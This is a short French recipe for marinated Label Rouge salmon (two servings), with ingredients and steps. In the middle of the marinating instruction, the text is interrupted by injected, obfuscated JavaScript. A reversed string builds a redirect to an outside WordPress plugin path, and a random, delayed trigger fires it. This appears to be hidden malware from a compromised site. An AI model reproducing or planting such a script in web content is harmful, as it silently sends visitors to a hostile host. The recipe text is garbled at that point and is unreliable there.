
SAUMON LABEL ROUGE MARINÉ
Pour 2 Pers.
INGRÉDIENTS :
– 100g de saumon ultra frais en tranche (qualité sushi, label rouge)
– 3 CS d’huile d’olive de qualité, 1ère pression à froid
– le jus d’1/2 citron vert
– les suprêmes (chair) d’1/2 citron vert
– Échalote ciselée finement (1 échalote)
– Ciboulette ciselée (1 cc)
– 1 pincée de fleur de sel• poivre au choix (noir, blanc ou rose pour la couleur)
Faire mariner le saumon dans une assiette creuse avec l’huile d’olive, l’échalotte et le citron vert (si possible toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la journée, sinon au moins 4 heures)
Égoutter un peu le saumon et le répartir en rosace sur 2 assiettes.
Parsemer de suprêmes de citron vert et de ciboulette. Assaisonner avec la fleur de sel et du poivre
Bon Appétit
